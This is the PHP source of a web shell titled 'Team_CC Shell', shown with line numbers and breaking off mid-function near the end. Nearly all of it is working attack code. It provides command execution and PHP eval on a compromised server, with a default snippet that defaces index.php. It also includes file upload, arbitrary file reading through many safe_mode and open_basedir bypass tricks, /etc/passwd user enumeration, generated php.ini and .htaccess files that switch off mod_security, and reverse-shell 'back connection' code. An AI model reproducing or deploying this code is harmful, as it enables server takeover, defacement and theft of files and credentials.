Team_CC Shell Release V.1

1. <?php
2. # Bypass SuHosin
3. # Virtual
4. # users 6 ID /etc/passwd
5.  
6. $user = 'sec_d@rK';
7. $pass = 'Nodisturbcc';
8. $uselogin = 1;
9. $sh3llColor = "green";
10.  
11. # MySQL Info ---------
12. $DBhost = "localhost";
13. $DBuser = "root";
14. $DBpass = "root";
15. #---------------------
16. session_start();
17. error_reporting(0);
18. set_magic_quotes_runtime(0);
19. set_time_limit(0);
20. ignore_user_abort(TRUE);
21. ini_restore("safe_mode");
22. ini_restore("open_basedir");
23. ini_set('max_execution_time',0);
24. ini_set('output_buffering',0);
25. ini_set('safe_mode','Off');
26.  
27. // Set Current Directory
28. if(!$_POST && !$_SESSION['curDir']) {
29. $dir = getcwd();
30. $_SESSION['curDir'] = $dir;
31. } else if(empty($_POST['curDir'])) {
32. $dir = $_SESSION['curDir'];
33. } else {
34. $dir = filter($_POST['curDir']);
35. $_SESSION['curDir'] = $dir;
36. }
37. // Set Dir Mode
38. if($_GET['dir_mode']) {
39. $dir_mode = $_GET['dir_mode'];
40. $_SESSION['dir_mode'] = $dir_mode;
41. } else {
42. $dir_mode = $_SESSION['dir_mode'];
43. }
44.  
45. // Set Usable Command
46. if($_POST['exe_method']) {
47. $exec_method = $_POST['exe_method'];
48. } else {
49. $exec_method = "exec";
50. }
51. # Logout
52. if($_POST['logout']) {
53. print '<script>document.cookie="user=;";document.cookie="pass=;";</script>';
54. print '<script>document.location = "'.$_SERVER['PHP_SELF'].'";</script>';
55. }
56. if(strlen($dir)>1 && $dir[1]==":"){$os = "Windows";}else {$os = "Linux";}
57. if($_GET['info']){phpinfo();}
58. $safeMode = SafeMode();
59. $server = substr($SERVER_SOFTWARE,0,120);
60. $daemon = "";
61. ?>
62. <html>
63. <head>
64. <title>Team_CC Security Shell :: Team_CC Security Shell</title>
65. <link rel="shortcut icon" href='http://oi44.tinypic.com/2na8cd4.jpg' />
66. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
67. <?php echo CSS($sh3llColor); ?>
68.  
69. </head>
70. <body dir='ltr'>
71. <?php
72. # ---------------------------------------#
73. # Authentication #
74. #----------------------------------------#
75. if ($uselogin ==1) {
76. if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) {
77. if($_GET) {$user = $_GET['user'];$pass = $_GET['pass'];}
78. if($_POST['usrname']==$user && $_POST['passwrd']==$pass){
79. print'<script>document.cookie="user='.$_POST['usrname'].';";document.cookie="pass='.md5($_POST['passwrd']).';";</script>';
80. } else {
81. if($_POST['usrname']){
82. print'<script>alert("Go and play in the street man !!");</script>';
83. }
84. ?>
85. <br><br>
86. <center><img src="http://oi44.tinypic.com/2na8cd4.jpg"><br />
87. <sy>Team_CC</sy>
88. </center><br />
89. <div align="center">
90. <form method="POST" name="login_form" onSubmit="if(this.usrname.value==''){return false;}">
91. <input dir="ltr" name="usrname" id="username" value="" type="text" size="30" onBlur="Blur('username','userName');" onClick="Clear('username','userName');"/><br>
92. <input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onFocus="Focus(2);" /><br>
93. <input type="submit" value=" Login " name="login" />
94. </form>
95. </div>
96. <?php
97. footer();
98. exit;
99. }
100. }
101. }
102. ?>
103. <table cellpadding='0' cellspacing='0' width='100%'>
104. <tr>
105. <td width='160'>
106. <center><form method="post"><input type="submit" value="Logout" name="logout" id="logout" /></form></center>
107. <a href="<?php echo $_SERVER['PHP_SELF']; ?>"><img border='0' src='http://oi44.tinypic.com/2na8cd4.jpg' width='100%' height='100%'></a><br>
108. <center>Team_CC
109. <p></p>
110. <select name="dir_mode" id="dir_mode" onchange="change_dir_mode();">
111. <option value="cmd" <?php if($dir_mode == "cmd") {echo "selected";} ?> >CMD</option>
112. <option value="php" <?php if($dir_mode == "php") {echo "selected";} ?>>PHP</option>
113. </select>
114. </center>
115. </td>
116. <td>
117. <form method="post">
118. <table width='100%' style="border:none; padding:2px;" >
119. <tr>
120. <td width='103'>System</td>
121. <td width="323"><?php echo $os; ?></td>
122. <td width="90">Apache Modules</td>
123. <td width="278"><select ><?php
124. if(function_exists("apache_get_modules")) {
125. foreach (apache_get_modules() as $module) {
126. echo "<option>".$module."</option>";
127. }
128. }else {
129. echo "<option>NONE</option>";
130. }
131. ?></select></td>
132. </tr>
133. <tr>
134. <td>uname </td>
135. <td><a href='http://www.google.com/Team_CCrch?q=<?php echo php_uname(); ?>' target='_blank'><u><?php echo php_uname(); ?></u></a></td>
136. <td>Curl</td>
137. <td><?php echo Curl(); ?></td>
138. </tr>
139. <tr>
140. <td>pwd</td>
141. <td><?php echo getcwd(); ?></td>
142. <td>Open Basedir</td>
143. <td><?php echo openBaseDir(); ?></td>
144. </tr>
145. <tr>
146. <td>whoami</td>
147. <td><?php echo get_current_user(); ?></td>
148. <td>Magic_Quotes</td>
149. <td><?php echo magicQouts(); ?></td>
150. </tr>
151. <tr>
152. <td>Server</td>
153. <td><?php echo $server; ?></td>
154. <td>Register Globals</td>
155. <td><?php echo RegisterGlobals(); ?></td>
156. </tr>
157. <tr>
158. <td>Server Name</td>
159. <td><?php echo $_SERVER['HTTP_HOST']; ?></td>
160. <td>Gzip</td>
161. <td><?php echo Gzip(); ?></td>
162. </tr>
163. <tr>
164. <td>Your IP</td>
165. <td><?php echo GetRealIP(); ?></td>
166. <td>Oracle</td>
167. <td><?php echo Oracle(); ?></td>
168. </tr>
169. <tr>
170. <td>Server IP</td>
171. <td><a href='http://bing.com/Team_CCrch?q=ip:<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>&go=&form=QBLH&filt=all' target='_blank'><u><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></u></a> [<a href="http://whois.webhosting.info/<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>" target='_blank' />Reverse IP]</td>
172. <td>MSQL</td>
173. <td><?php echo MSQL(); ?></td>
174. </tr>
175. <tr>
176. <td>PHP Version</td>
177. <td><a href='javascript:openPHPInfo();'><u><?php echo phpversion(); ?></u></a></td>
178. <td>MySQL</td>
179. <td><?php echo MySQL2()." ".mysql_get_server_info(); ?></td>
180. </tr>
181. <tr>
182. <td>Safe Mode</td>
183. <td><?php echo $safeMode; ?></td>
184. <td>MySQLi</td>
185. <td><?php echo MysqlI(); ?></td>
186. </tr>
187. <tr>
188. <td>disable functions</td>
189. <td><select name="disableFunctions"><?php
190. $funArray = DisableFunctions();
191. $funArray = explode(",",$funArray);
192. sort($funArray);
193. foreach($funArray as $fun){echo "<option value='".$fun."'>".$fun."</option>";}
194. ?></select>
195. <input name="STOP_Execute" type="submit" id="STOP_Execute" value="Turn Off" />
196. </td>
197. <td>MsSQL</td>
198. <td><?php echo MsSQL(); ?></td>
199. </tr>
200. </table>
201. &nbsp; [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
202. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
203. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
204. <input name="USERS_1" type="submit" id="USERS_1" value="Users [1]" />
205. <input name="USERS_2" type="submit" id="USERS_2" value="Users [2]" />
206. <input name="USERS_3" type="submit" id="USERS_3" value="Users [3]" />
207. <input name="USERS_4" type="submit" id="USERS_4" value="Users [4]" />
208. <input name="USERS_5" type="submit" id="USERS_5" value="Users [5]" />
209. <input type="submit" name="forbidden_bypass" id="forbidden_bypass" value="Forbidden" />
210. <input type="submit" name="find_755" id="find_755" value="Find 755" />
211. <br>
212. </form>
213. </table>
214.  
215. <form method="post">
216. <center>
217. <textarea cols="150" rows="20" name="result" >
218. <?php
219. chdir($dir);
220. if($_POST['login'] || !$_POST){echo ScanDirs();}
221. else if($_POST['CMD_Execute']){if(empty($_POST['CMD_Line'])){echo scanDirs();}else {Exe(urldecode(filter($_POST['CMD_Line']))); }}
222. else if($_POST['PHP_Execute']){$eval = Evaluation(urldecode(filter($_POST['PHP_Line'])));}
223. else if($_POST['UPLOAD_Execute']) {
224. for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
225. if($_FILES['uploadfile']['name'][$i] != '') {
226. if(function_exists('copy')){$upload = copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
227. else{$upload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
228. if($upload) {echo "The File ".$_FILES['uploadfile']['name'][$i]." Uploaded Successfully !
229. "; }
230. else { echo "The File ".$_FILES['uploadfile']['name'][$i]." Can't Be Upload :( !
231. ";}
232. }
233. }
234. }
235. else if($_POST['EDIT_Execute']){$content = htmlspecialchars(file_get_contents(filter($_POST['Edit_Line'])));echo $content;}
236. else if($_POST['SAVE_Execute']) {
237. $content = filter($_POST['result']);
238. if(empty($content)){$content = " ";}
239. if(GenerateFile($_POST['FILE_NAME'],$content)){echo "[+]Saved Success !! ";}else{echo "[-]Save Failed !";}
240. }
241. else if($_POST['READ_Execute']) {
242. $path = urldecode(filter($_POST['READ_Line']));
243. $file = fopen($path,'r+');
244. if($_POST['READ_Type'] == "file"){echo htmlspecialchars(filter(FileF($path))); }
245. else if($_POST['READ_Type'] == "fgets"){while(($line = htmlspecialchars(filter(fgets($file)))) != false){echo $line;}}
246. else if($_POST['READ_Type'] == "fgetss"){while(($line = htmlspecialchars(filter(fgetss($file)))) != false){echo $line;}}
247. else if($_POST['READ_Type'] == "readfile"){echo htmlspecialchars(filter(readfile($path)));}
248. else if($_POST['READ_Type'] == "fread"){echo htmlspecialchars(filter(fread($file,filesize($path))));}
249. else if($_POST['READ_Type'] == "file_get_contents"){echo htmlspecialchars(filter(file_get_contents($path)));}
250. else if($_POST['READ_Type'] == "tempnam"){echo htmlspecialchars(filter(TempnameF($path)));}
251. else if($_POST['READ_Type'] == "copy"){echo htmlspecialchars(filter(CopyF($path)));}
252. else if($_POST['READ_Type'] == "mb_send_mail"){echo htmlspecialchars(filter(mbSendEmail($path)));}
253. else if($_POST['READ_Type'] == "highlight_file"){echo htmlspecialchars(filter(highlightFile($path)));}
254. else if($_POST['READ_Type'] == "curl"){echo htmlspecialchars(filter(CurlFileRead($path)));}
255. else if($_POST['READ_Type'] == "imap"){echo htmlspecialchars(filter(ImapF($path)));}
256. else if($_POST['READ_Type'] == "id"){echo htmlspecialchars(filter(ReadId($path)));}
257. else if($_POST['READ_Type'] == "show_source"){echo htmlspecialchars(filter(show_source($path)));}
258. else if($_POST['READ_Type'] == "mysql"){echo htmlspecialchars(filter(MySQLReader($path)));}
259. else if($_POST['READ_Type'] == "mysqli"){echo htmlspecialchars(filter(MySQLIReader($path)));}
260. else if($_POST['READ_Type'] == "symlink"){echo htmlspecialchars(filter(SymlinkF($path)));}
261. else if($_POST['READ_Type'] == "ioncube"){echo htmlspecialchars(filter(ioncube_read_file($path)));}
262. else if($_POST['READ_Type'] == "error_log"){echo htmlspecialchars(filter(ErrorLog($path)));}
263. else if($_POST['READ_Type'] == "include"){echo htmlspecialchars(filter(IncludeReader($path)));}
264. }
265. else if($_POST['STOP_Execute']) {
266. $genTry = GenerateFile("php.ini","
267. safe_mode = Off
268. disable_functions = NONE
269. safe_mode_gid = OFF
270. open_basedir = OFF");
271. if($genTry){echo "[+] php.ini Has Been Generated Successfully
272. ";}
273. else {echo "[-] Failed to generate php.ini file !!
274. ";}
275.  
276. $genTry = GenerateFile(".htaccess","
277. <IfModule mod_security.c>
278. SecFilterEngine Off
279. SecFilterScanPOST Off
280. SecFilterCheckURLEncoding Off
281. SecFilterCheckCookieFormat Off
282. SecFilterCheckUnicodeEncoding Off
283. SecFilterNormalizeCookies Off
284. </IfModule>
285. <Limit GET POST>
286. order deny,allow
287. deny from all
288. allow from all
289. </Limit>
290. <Limit PUT DELETE>
291. order deny,allow
292. deny from all
293. </Limit>
294. SetEnv PHPRC ".getcwd()."/php.ini
295. ");
296. if($genTry){echo "[+] .htaccess Has Been Generated Successfully
297. ";}
298. else {echo "[-] Failed to generate .htaccess file !!
299. ";}
300. }
301. else if($_POST['CON_Type'] == "socks") {
302. $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
303. if($sock < 0){echo "[-] failed to create socket.";}
304. else {
305. $result = socket_connect($sock, filter(trim($_POST['ip'])), filter(trim($_POST['port'])));
306. if($result < 0){echo "[-] failed to connect back to host:".$_GET['host'];}
307. else {
308. $send_var = "\n\n -== Team_CC , Back Connection ==-\n$";
309. socket_write($sock, $send_var, strlen($send_var));
310. while($input = socket_read($sock, 10000)) {
311. socket_write($sock, shell_exec($input), 12000);
312. }
313. }
314. }
315. } else if($_POST['CON_Type'] == "fsockopen") {
316. $ip = filter(trim($_POST['ip']));
317. $port = filter(trim($_POST['port']));
318. if (!empty($ip)) {
319. $con_fsockopen = fsockopen($ip , $port , $errno, $errstr );
320. if (!$con_fsockopen){
321. $result = "Error: didnt connect !!!";
322. } else {
323. $newLine="\n";
324. fputs ($con_fsockopen ,"\n\n -== Team_CC , Back Connection ==-\n$");
325. fputs($con_fsockopen , system("uname -a") .$newLine );
326. fputs($con_fsockopen , system("pwd") .$newLine );
327. fputs($con_fsockopen , system("id") .$newLine.$newLine );
328. while(!feof($con_fsockopen)){
329. fputs ($con_fsockopen);
330. $one="[$";
331. $two="]";
332. $result= fgets ($con_fsockopen, 8192);
333. $message = $result;
334. fputs ($con_fsockopen, $one. system("whoami") .$two. " " .$message."\n");
335. }
336. fclose ($con_fsockopen);
337. }
338. }
339. }
340. else if($_POST['USERS_1']){echo GetUsers1();}
341. else if($_POST['USERS_2']) {
342. $array = GetUsers2();
343. foreach($array as $line)
344. {echo $line."
345. ";}
346. }
347. else if($_POST['USERS_3']) {
348. $array = GetUsers3();
349. foreach($array as $line)
350. {echo $line."
351. ";}
352. }
353. else if($_POST['USERS_4']) {
354. $array = GetUsers4();
355. foreach($array as $line)
356. {echo $line."
357. ";}
358. } else if($_POST['USERS_5']){echo GetUsers5();}
359. else if($_POST['forbidden_bypass']) {
360. mkdir("forbidden");
361. chdir("forbidden");
362. $forbidden_htaccess = GenerateFile(".htaccess", "
363. DirectoryIndex cc.txt
364. HeaderName cc.txt
365. ReadmeName cc.txt
366. footerName cc.txt
367. ErrorDocument 404 /404.html
368. 404.html = Symlinked cc.txt
369. Options all
370. ForceType text/plain
371. AddType text/plain .php
372. AddType text/plain .html
373. AddHandler server-parsed .php
374. AddHandler txt .php
375. ");
376. if($forbidden_htaccess) {
377. echo "[+] make your symlink as cc.txt in /forbidden/ folder and find the url /forbidden/cc.txt or /forbidden/";
378. } else {
379. echo "[-] error with generating .htaccess file.";
380. }
381. } else if($_POST['find_755']) {
382. Exe("ls -dl /home/*/public_html/ | grep drwxr-xr-x");
383. }
384. ?></textarea>
385. <?php
386. if($_POST['EDIT_Execute']){echo "<input type='submit' value='Save' name='SAVE_Execute' class='Save' />
387. <input type='hidden' name='FILE_NAME' value='".$_POST['Edit_Line']."' />
388. ";}
389. ?>
390. </center></form>
391. <table width='100%'>
392. <tr valign="top">
393. <td width='30%'>
394. <!-- Command Line -->
395. <form method='POST' enctype="multipart/form-data">
396. <table height='72' border='0' id='Box' width="100%">
397. <tr>
398. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
399. <td style="background-color:#666;padding-left:10px;">Edit File
400. <input name="EDIT_Execute" type="submit" id="EDIT_Execute" value="Edit" /></td>
401. </tr>
402. <tr>
403. <td height="45" colspan="2"><input type='text' name='Edit_Line' id='Edit_Line' value='<?php if($_POST['EDIT_Execute']){echo filter($_POST['Edit_Line']);}else {echo $dir;} ?>' size="70"></td>
404. </tr>
405. </table>
406. </form>
407. <!-- End Of Command Line-->
408.  
409. </td>
410. <td width='30%' height='30'>
411. <!-- Command Line -->
412. <form method='POST' enctype="multipart/form-data">
413. <table height='72' border='0' id='Box'>
414. <tr>
415. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
416. <td style="background-color:#666;padding-left:10px;">Command Line
417. <?php echo print_exe_method(); ?>
418. <input name="CMD_Execute" type="submit" id="CMD_Execute" value="Execute" onClick="document.getElementById('CMD_Line').value = encodeURIComponent(document.getElementById('CMD_Line').value);">
419. </td>
420. </tr>
421. <tr>
422. <td height="45" colspan="2">
423. <?php echo SelectCommand($os); ?>
424. <input type='text' name='CMD_Line' id='CMD_Line' value='' size="70">
425. <input name="curDir" type="text" id="curDir" value="<?php if($_POST['Execute']){echo $_POST['curDir'];} else {echo getcwd();} ?>" size="70"></td>
426. </tr>
427. </table>
428. </form>
429. <!-- End Of Command Line-->
430. </td>
431. <td width='30%' height='30' valign="top">
432. <!-- Commands Alias-->
433. <form method='POST' enctype="multipart/form-data">
434. <table width='100%' height='72' border='0' id='Box'>
435. <tr>
436. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
437. <td style="background-color:#666;padding-left:10px;">Upload Files <span style="padding-left:10px;">
438. <input type='button' value='+' id='addUpload' size='5' onclick='addUploadInput();'>
439. <input name='UPLOAD_Execute' type='submit' id="UPLOAD_Execute" value='Upload Files'>
440. </span></td>
441. </tr>
442. <tr>
443. <td height="45" colspan="2">
444. <input type='file' name='uploadfile[]'>
445. <input type='file' name='uploadfile[]'><div id='uploadInput'></div></td>
446. </tr>
447. </table>
448. </form>
449. <!-- End Of Commands Alias-->
450. </td>
451. </tr>
452. <tr valign="top">
453. <td width='30%'>
454. <!-- Commands Alias-->
455. <form method='POST' enctype="multipart/form-data">
456. <table width='100%' height='72' border='0' id='Box'>
457. <tr>
458. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
459. <td style="background-color:#666;padding-left:10px;">PHP Eval
460. <input name="PHP_Execute" type="submit" id="PHP_Execute" onClick="document.getElementById('PHP_Line').value = encodeURIComponent(document.getElementById('PHP_Line').value);" value="Evaluate"></td>
461. </tr>
462. <tr>
463. <td height="45" colspan="2"><label for="PHP_Line"></label>
464. <textarea name="PHP_Line" id="PHP_Line" cols="50" rows="2"><?php if($_POST['PHP_Execute']){echo urldecode(filter($_POST['PHP_Line']));}else {echo '$file = fopen("index.php","w+");
465. fwrite($file,"Hacked");
466. fclose($file);';}
467. ?>
468. </textarea>
469. <br></td>
470. </tr>
471. </table>
472. </form>
473. <!-- End Of Commands Alias-->
474. </td>
475. <td width='30%' height='30'>
476. <!-- Commands Alias-->
477. <form method='POST' enctype="multipart/form-data">
478. <table width='100%' height='72' border='0' id='Box'>
479. <tr>
480. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
481. <td style="background-color:#666;padding-left:10px;">Read Files
482.  
483. <select name="READ_Type" >
484. <option value="file" >file</option>
485. <option value="fgets" >fgets</option>
486. <option value="fgetss" >fgetss</option>
487. <option value="readfile" >readfile</option>
488. <option value="fread" >fread</option>
489. <option value="show_source" >show_source</option>
490. <option value="file_get_contents" >file_get_contents</option>
491. <option value="tempnam" >tempnam</option>
492. <option value="copy" >copy</option>
493. <option value="symlink" >Symlink</option>
494. <option value="mb_send_mail" >mb_send_mail</option>
495. <option value="highlight_file" >highlight_file</option>
496. <option value="curl" >Curl</option>
497. <option value="imap" >Imap</option>
498. <option value="mysql" >MySQL</option>
499. <option value="mysqli" >MySQLI</option>
500. <option value="ioncube">Ion Cube</option>
501. <option value="error_log">Error_Log</option>
502. <option value="include">Include</option>
503. <option value="id" >ID /etc/passwd</option>
504. </select>
505. <input name="READ_Execute" type="submit" id="READ_Execute" onClick="document.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td>
506. </tr>
507. <tr>
508. <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td>
509. </tr>
510. </table>
511. </form>
512. <!-- End Of Commands Alias-->
513. </td>
514. <td width='30%' height='30' valign="top">
515. <!-- Commands Alias-->
516. <form method='POST' enctype="multipart/form-data">
517. <table width='100%' height='72' border='0' id='Box'>
518. <tr>
519. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
520. <td style="background-color:#666;padding-left:10px;">Back Connection
521. <input name='CON_Execute' type='submit' id="CON_Execute" value='Connect'></td>
522. </tr>
523. <tr>
524. <td height="45" colspan="2"><input type="text" name="ip" value="<?php if($_POST['CON_Execute']){echo $_POST['ip']; }else {echo GetRealIP(); } ?>" />
525. <input type="text" name="port" value="<?php if($_POST['CON_Execute']){echo $_POST['port']; }else {echo "443"; } ?>" />
526. <select name="CON_Type" >
527. <option value="socks">SOCKS</option>
528. <option value="fsockopen">FSOCKOPEN</option>
529. </select>
530. </td>
531. </tr>
532. </table>
533. </form>
534. <!-- End Of Commands Alias-->
535. </td>
536. </tr>
537. </table>
538. <?php
539. function IncludeReader($path) {
540. global $os;
541. if($os == "Windows"){$slash = "\\";}else{$slash = "/";}
542. $fileName = substr(strrchr($path,$slash),1);
543. $includePath = substr($path,0,strpos($path,$fileName,0));
544. ini_set("include_path",$includePath);
545. include($fileName);
546. }
547. function GetUsers1() {
548. return Exe('ls /var/mail');
549. }
550. function GetUsers2() {
551. $array = array();
552. $lines = file("/etc/passwd");
553. foreach($lines as $nr=>$val) {
554. $str = explode(":",$val);
555. array_push($array,$str[0]);
556. }
557. return $array;
558. }
559. function GetUsers3() {
560. $array = array();
561. if ($dh = opendir("/home/")) {
562. while (($file = readdir($dh)) !== false) {
563. array_push($array,$file);
564. }
565. closedir($dh);
566. return $array;
567. }
568. }
569. function GetUsers4() {
570. $dir = "/home/";
571. $array = array();
572. if ($dh = opendir($dir)) {
573. $f = readdir($dh);
574. while (($f = readdir($dh)) !== false) {
575. $dh2=opendir($dir."/");
576. $f2 = readdir($dh2);
577. while (($f2 = readdir($dh2)) !== false) {
578. $f2.="/";
579. $dh3=opendir($dir.$f.$f2);
580. $f3 = readdir($dh3);
581. while (($f3 = readdir($dh3)) !== false) {
582. array_push($array,$f3);
583. }
584. }
585. }
586. closedir($dh);
587. return $array;
588. }
589. }
590. function GetUsers5(){
591. return realpath('/etc/passwd');
592. }
593. function ErrorLog($path){
594. $tempFile = uniqid();
595. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
596. error_log(file_get_contents($path), 3, $tempFile);
597. $content = file_get_contents($tempFile);
598. unlink($tempFile);
599. return $content;
600. }
601. function SymlinkF($path) {
602. $tempFile = uniqid();
603. if(function_exists('symlink')) {
604. symlink($path,$tempFile);
605. $content = file_get_contents($tempFile);
606. unlink($tempFile);
607. return $content;
608. }
609. }
610. function MySQLReader($path) {
611. global $DBhost,$DBuser,$DBpass;
612. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
613. $con = mysql_connect($DBhost,$DBuser,$DBpass);
614. mysql_query("CREATE DATABASE a");
615. mysql_query("CREATE TABLE a.a (a varchar(1024))");
616. mysql_query("GRANT SELECT,INSERT ON a.a TO '".$DBuser."'");
617. mysql_query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a") or die(mysql_error());
618. $result = mysql_query("SELECT a FROM a.a");
619. while(list($row) = mysql_fetch_row($result)){print $row . chr(10);}
620. mysql_query("DROP DATABASE a");
621. }
622. function MySQLIReader($path) {
623. global $DBhost,$DBuser,$DBpass;
624. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
625. $con = mysql_connect($DBhost,$DBuser,$DBpass);
626. mysql_query("CREATE DATABASE a");
627. mysql_query("CREATE TABLE a.a (a varchar(1024))");
628.  
629. function r($fp, &$buf, $len, &$err) {
630. print fread($fp, $len);
631. }
632. $m = new mysqli($DBhost, $DBuser, $DBpass, 'a');
633. $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
634. $m->set_local_infile_handler("r");
635. $m->query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a");
636. $m->close();
637. }
638. function DBConnect($host,$user,$pass,$db) {
639. $connect = mysql_pconnect($host,$user,$pass);
640. if(!$connect){echo "Can't Connect to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false; }
641. else {
642. $tryToSelectDB = mysql_select_db($db,$connect);
643. if(!$tryToSelectDB){echo "Can't Enter The Database [ ".$db." ]"; return false; }
644. else{return true; return $connect;}
645. }
646. }
647. function ReadId($path) {
648. for($uid=0;$uid<60000;$uid++) {
649. $ara = posix_getpwuid($uid);
650. if (!empty($ara)){while (list ($key, $val) = eah($ara)){$content .= $val;}
651. }
652. }
653. return $content;
654. }
655. function ImapF($path) {
656. $stream = imap_open($path, "", "");
657. $str = imap_body($stream, 1);
658. imap_close($stream);
659. return $str;
660. }
661. function FileF($path) {
662. $lines = file($path); foreach($lines as $line){$content .= $line;}
663. return $content;
664. }
665. function CopyF($path) {
666. $tempFile = md5(uniqid()).".bb";
667. copy($path,$tempFile);
668. $content = file_get_contents($tempFile);
669. unlink($tempFile);
670. return $content;
671. }
672. function fgetssF($path) {
673. while(($line = fgetss($path)) != false){$content .= $line;}
674. return $content;
675. }
676. function highlightFile($path) {
677. return highlight_file($path);
678. }
679. function mbSendEmail($path) {
680. if(function_exists('mb_send_mail')) {
681. $tempFile = uniqid();
682. $additional_param = "-C ".$path." -X ".getcwd()."/".$tempFile;
683. mb_send_mail("[email protected]", NULL, NULL, NULL, $additional_param);
684. $content = file_get_contents($tempFile);
685. unlink($tempFile);
686. return $content;
687. }
688. }
689. function DeleteFile($fileName) {
690. global $os;
691. if(function_exists('unlink'))
692. {$delete = unlink($fileName);}
693. if((!$delete) && ($os == 'Windows'))
694. {$delete = Exe("del $fileName"); }
695. else if((!$delete) && ($os == 'Linux'))
696. {$delete = Exe("rm -f $fileName");}
697. if($delete){return true;}else{return false;}
698. }
699. function CurlFileRead($path) {
700. $ch = curl_init("file://".$path."\x00".__FILE__);
701. var_dump(curl_exec($ch));
702. }
703. function FReadF($path) {
704. $file = fopen($path,'r+'); //Open The File
705. if(function_exists('fread')){htmlspecialchars(fread($file,filesize($file)));}
706. fclose($file);
707. }
708. function TempnameF($path) {
709. global $dir;
710. $temp = tempnam($dir, "cx");
711. if(copy("compress.zlib://".$path, $temp)) {
712. $handler = fopen($temp, "r");
713. $readFile = fread($handler, @filesize($temp));
714. fclose($handler);
715. $content .= htmlspecialchars($filename);
716. $content .= nl2br(htmlspecialchars($readFile));
717. $content .= htmlspecialchars($filename);
718. unlink($temp);
719. return $content;
720. }
721. }
722. function Evaluation($eval) {
723. $eval = str_replace(array("<?php","<?","?>"),"",$eval);
724. $eval = eval($eval);
725. if($eval){return true;}else{return false;}
726. }
727. function Oracle() {
728. if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';}
729. else {$oracle = '<font color="green">OFF</font>';}return $oracle;
730. }
731. function MsSQL() {
732. if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';}
733. else {$msSQL = '<font color="green">OFF</font>';}return $msSQL;
734. }
735. function MySQL2() {
736. $mysql_try = function_exists('mysql_connect');
737. if($mysql_try){$mysql = '<font color="red">ON</font>';}
738. else {$mysql = '<font color="green">OFF</font>';}return $mysql;
739. }
740. function MSQL() {
741. if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';}
742. else {$mSql = '<font color="green">OFF</font>';}return $mSql;
743. }
744. function MysqlI() {
745. if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';}
746. else {$mysqli = '<font color="green">OFF</font>';}return $mysqli;
747. }
748. function Gzip() {
749. if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';}
750. else {$gzip = '<font color="green">OFF</font>';}return $gzip;
751. }
752. function openBaseDir() {
753. $openBaseDir = ini_get("open_basedir");
754. if (!$openBaseDir){$openBaseDir = '<font color="green">OFF</font>';}
755. else {$openBaseDir = '<font color="red">ON</font>';}
756. return $openBaseDir;
757. }
758. function Curl() {
759. if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';}
760. else{$curl = '<font color="green">OFF</font>';}return $curl;
761. }
762. function magicQouts() {
763. if(function_exists('get_magic_quotes_gpc')){$mag = get_magic_quotes_gpc();}
764. if (empty($mag)){$mag = '<font color="green">OFF</font>';}
765. else {$mag= '<font color="red">ON</font>';}return $mag;
766. }
767. function SafeMode() {
768. $safe_mode = ini_get("safe_mode");
769. if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';}
770. else {$safe_mode = '<font color="red">ON</font>';}
771. return $safe_mode;
772. }
773. function DisableFunctions() {
774. $disfun = ini_get('disable_functions');
775. if (empty($disfun)){$disfun = '<font color="green">NONE</font>';}return $disfun;
776. }
777. function RegisterGlobals() {
778. if(ini_get('register_globals')){$registerg= '<font color="red">ON</font>';}
779. else{$registerg= '<font color="green">OFF</font>';}return $registerg;
780. }
781. function GetRealIP() {
782. if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);}
783. elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}
784. else {$ip=getenv(REMOTE_ADDR);}
785. return $ip;
786. }
787. function SelectCommand($os) {
788. global $os;
789. if($os == 'Windows') {
790. echo "
791. <select name='alias' id='alias' onChange='AddAlias();' >
792. <option value=''>NONE</option>
793. <option value='dir' >List Directory</option>
794. <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
795. <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</option>
796. <option value='netstat -an'>Show active connections</option>
